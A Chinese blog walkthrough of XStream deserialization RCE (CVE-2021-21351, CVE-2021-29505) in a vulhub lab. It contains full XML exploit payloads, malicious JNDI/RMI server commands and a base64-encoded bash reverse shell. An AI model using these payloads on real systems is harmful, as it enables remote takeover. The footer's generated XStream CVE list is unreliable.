vulhub漏洞复现75_XStream

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量484 收藏 1
点赞数
文章标签: 安全 java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122916161
版权

一、 CVE-2021-21351_XStream 反序列化命令执行漏洞

前言

XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。

漏洞详情

XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用`javax.naming.ldap.Rdn$RdnEntry`及`javax.sql.rowset.BaseRowSet`构造JNDI注入,进而执行任意命令。

参考链接:

- https://x-stream.github.io/CVE-2021-21351.html

- https://paper.seebug.org/1543/

- https://www.veracode.com/blog/research/exploiting-jndi-injections-java

- https://github.com/welk1n/JNDI-Injection-Exploit/

漏洞环境

靶场:192.168.4.10_ubuntu

攻击机:192.168.4.29_kali

执行如下命令启动一个Springboot + XStream 1.4.15的环境:

#docker-compose up -d

环境启动后,我们向`http://your-ip:8080`发送一个正常的XML数据包,将会得到预期返回:

 

漏洞复现

由于目标环境Java版本高于8u191,故我们需要借助[这篇文章](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)中给出的方法,使用`org.apache.naming.factory.BeanFactory`加EL表达式注入的方式来执行任意命令。

1. 使用[这个工具](https://github.com/welk1n/JNDI-Injection-Exploit/)启动恶意JNDI服务器:

```

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.1.142

```

 

2. 使用上图中基于SpringBoot利用链的RMI地址作为`<dataSource>`的值,构造POC如下:

```

POST / HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: application/xml

Content-Length: 3184

<sorted-set>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>

      <m__DTMXRTreeFrag>

        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>

          <m__size>-10086</m__size>

          <m__mgrDefault>

            <__overrideDefaultParser>false</__overrideDefaultParser>

            <m__incremental>false</m__incremental>

            <m__source__location>false</m__source__location>

            <m__dtms>

              <null/>

            </m__dtms>

            <m__defaultHandler/>

          </m__mgrDefault>

          <m__shouldStripWS>false</m__shouldStripWS>

          <m__indexing>false</m__indexing>

          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>

            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>

              <javax.sql.rowset.BaseRowSet>

                <default>

                  <concurrency>1008</concurrency>

                  <escapeProcessing>true</escapeProcessing>

                  <fetchDir>1000</fetchDir>

                  <fetchSize>0</fetchSize>

                  <isolation>2</isolation>

                  <maxFieldSize>0</maxFieldSize>

                  <maxRows>0</maxRows>

                  <queryTimeout>0</queryTimeout>

                  <readOnly>true</readOnly>

                  <rowSetType>1004</rowSetType>

                  <showDeleted>false</showDeleted>

                  <dataSource>rmi://evil-ip:1099/example</dataSource>

                  <listeners/>

                  <params/>

                </default>

              </javax.sql.rowset.BaseRowSet>

              <com.sun.rowset.JdbcRowSetImpl>

                <default/>

              </com.sun.rowset.JdbcRowSetImpl>

            </fPullParserConfig>

            <fConfigSetInput>

              <class>com.sun.rowset.JdbcRowSetImpl</class>

              <name>setAutoCommit</name>

              <parameter-types>

                <class>boolean</class>

              </parameter-types>

            </fConfigSetInput>

            <fConfigParse reference='../fConfigSetInput'/>

            <fParseInProgress>false</fParseInProgress>

          </m__incrementalSAXSource>

          <m__walker>

            <nextIsRaw>false</nextIsRaw>

          </m__walker>

          <m__endDocumentOccured>false</m__endDocumentOccured>

          <m__idAttributes/>

          <m__textPendingStart>-1</m__textPendingStart>

          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>

          <m__pastFirstElement>false</m__pastFirstElement>

        </m__dtm>

        <m__dtmIdentity>1</m__dtmIdentity>

      </m__DTMXRTreeFrag>

      <m__dtmRoot>1</m__dtmRoot>

      <m__allowRelease>false</m__allowRelease>

    </value>

  </javax.naming.ldap.Rdn_-RdnEntry>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XString'>

      <m__obj class='string'>test</m__obj>

    </value>

  </javax.naming.ldap.Rdn_-RdnEntry>

</sorted-set>

```

 

特别注意,evil-ip是恶意RMI(非执行后地址,实际为.jar地址,本次在192.168.4.29_kali上执行,则rmi地址为192.168.4.29)服务器的地址。然后,进入目标容器内,可见``touch /tmp/success``已成功执行:

 在实战中,如果目标Java版本较低,POC需要做修改,将其中的`<__overrideDefaultParser>false</__overrideDefaultParser>`改成`<__useServicesMechanism>false</__useServicesMechanism>`即可。

二、 CVE-2021-29505_XStream 反序列化命令执行漏洞

漏洞详情

XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用`sun.rmi.registry.RegistryImpl_Stub`构造RMI请求,进而执行任意命令。

参考链接:

- [https://x-stream.github.io/CVE-2021-29505.html][1]

- https://paper.seebug.org/1543/

漏洞环境

执行如下命令启动一个Springboot + XStream 1.4.16的环境:

#docker-compose up -d

环境启动后,我们向`http://your-ip:8080`发送一个正常的XML数据包,将会得到预期返回:

漏洞复现

1.作为攻击者,我们在自己的服务器上使用[ysoserial](https://github.com/frohoff/ysoserial)的JRMPListener在4444端口启动一个恶意的RMI Registry:

```

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMjkvOTk5OSAwPiYxCg==}|{base64,-d}|{bash,-i}"

```

这个RMI Registry在收到请求后,会返回用CommonsCollections6利用链构造的恶意序列化对象。

2. 然后,我们向目标服务器发送CVE-2021-29505的XML POC:

```

POST / HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: application/xml

Content-Length: 3169

<java.util.PriorityQueue serialization='custom'>

    <unserializable-parents/>

    <java.util.PriorityQueue>

        <default>

            <size>2</size>

        </default>

        <int>3</int>

        <javax.naming.ldap.Rdn_-RdnEntry>

            <type>12345</type>

            <value class='com.sun.org.apache.xpath.internal.objects.XString'>

                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>

            </value>

        </javax.naming.ldap.Rdn_-RdnEntry>

        <javax.naming.ldap.Rdn_-RdnEntry>

            <type>12345</type>

            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>

                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>

                    <parsedMessage>true</parsedMessage>

                    <soapVersion>SOAP_11</soapVersion>

                    <bodyParts/>

                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>

                        <attachmentsInitialized>false</attachmentsInitialized>

                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>

                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>

                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>

                                    <names>

                                        <string>aa</string>

                                        <string>aa</string>

                                    </names>

                                    <ctx>

                                        <environment/>

                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>

                                            <java.rmi.server.RemoteObject>

                                                <string>UnicastRef</string>

                                                <string>evil-ip</string>

                                                <int>1099</int>

                                                <long>0</long>

                                                <int>0</int>

                                                <long>0</long>

                                                <short>0</short>

                                                <boolean>false</boolean>

                                            </java.rmi.server.RemoteObject>

                                        </registry>

                                        <host>evil-ip</host>

                                        <port>1099</port>

                                    </ctx>

                                </candidates>

                            </aliases>

                        </nullIter>

                    </sm>

                </message>

            </value>

        </javax.naming.ldap.Rdn_-RdnEntry>

    </java.util.PriorityQueue>

</java.util.PriorityQueue>

```

 

其中,evil-ip是恶意RMI服务器的地址。恶意RMI服务器收到RMI请求,触发

 3.  监听成功反弹shell

Revenge_scan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞CVE-2013-4547)
JiangBuLiu的博客
07-12 823
Nginx 文件名逻辑漏洞CVE-2013-4547)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/nginx/CVE-2013-4547/ 漏洞原理 影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 参考链接: http://cve.mitre.or...
Vulhub漏洞复现
weixin_45995579的博客
09-30 1691
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
最新发布
小司机的奥拓
04-23 1371
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
漏洞复现vulhub 中间件漏洞
qq_46421742的博客
08-09 366
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhubWeblogic(CVE-2017-10271)漏洞复现
qq_45300786的博客
04-10 1167
背景介绍 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 启动vulhub里的weblogic服务 漏洞存在于以下路径:http://192.168.100.23:7001//wls-wsat/CoordinatorPortType11 漏洞复现 在攻击机用nc监听端口: 用burpsuite发送如下post报文。 (记得把ip(192.168.100.34)
vulhub漏洞复现1
xhscxj的博客
05-23 1906
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
TestXStream_feedxs3_XStream_
10-02
XStrem xml 序列化,反序列化代码
android_xStream
12-19
使用xStream 将xml转list类
xstream_1.4.3及其依赖包_xstream_1.4.3及其依赖包
09-22
解析xml文件需要用到jar包,内容包含xstream_1.4.3及_xstream_1.4.3 -dom4j及其依赖包,需要用到的都含有
接口的编写与接收外部接口_xstream
07-20
接口的编写与接收外部接口_xstream(实例,可直接部署运行+说明文档)
漏洞复现——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 846
vulhub中ssrf漏洞复现
vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1815
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码
利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞
JiangBuLiu的博客
07-03 9059
Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试 Vulnhub官方复现教程 https://vulhub.org/#/environments/fastjson/vuln/ 漏洞原理 http://xxlegend.com/2017/04/29/title-%20fas...
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1017
vulhub漏洞复现练习篇
vulfocus漏洞复现】Spring boot (CVE-2021_21234)
一剑开天门!的博客
03-02 5226
vulfocus漏洞复现】Spring boot (CVE-2021_21234)
XStream反序列化漏洞分析二
weixin_44825990的博客
12-13 688
XStream反序列化流程及CVE-2020-26217漏洞分析
xstream 相关漏洞学习
问题很多的小明
05-28 421
参考:https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用 xstream主要作用:类与XML互相转换 引入依赖 <dependencies> <dependency> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream</artifactId>
xstream 远程代码执行CVE-2021-29505
YouthBelief的博客
11-14 1322
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
xstream漏洞有哪些
04-28
XStream 是一个 Java 序列化和反序列化库,它可以将 Java 对象序列化为 XML 或 JSON 格式,也可以将 XML 或 JSON 反序列化为 Java 对象。但是,由于 XStream 序列化和反序列化的机制存在一些缺陷,可能会导致安全漏洞。以下是一些已知的 XStream 漏洞: 1. XStream 反序列化漏洞CVE-2013-7285):攻击者可以构造恶意 XML 文件,通过反序列化漏洞实现任意代码执行。 2. XStream 类型转换漏洞CVE-2013-7286):攻击者可以构造恶意 XML 文件,通过类型转换漏洞实现任意代码执行。 3. XStream DTD 漏洞:攻击者可以通过在 XML 文件中注入恶意 DTD,实现任意文件读取和 SSRF 攻击。 4. XStream 集合类反序列化漏洞CVE-2017-7957):攻击者可以构造恶意 XML 文件,通过反序列化漏洞实现任意代码执行。 5. XStream 反射漏洞CVE-2018-2628):攻击者可以构造恶意 XML 文件,通过反射漏洞实现任意代码执行。 总之,使用 XStream 序列化和反序列化 Java 对象时,需要注意安全性,避免出现安全漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值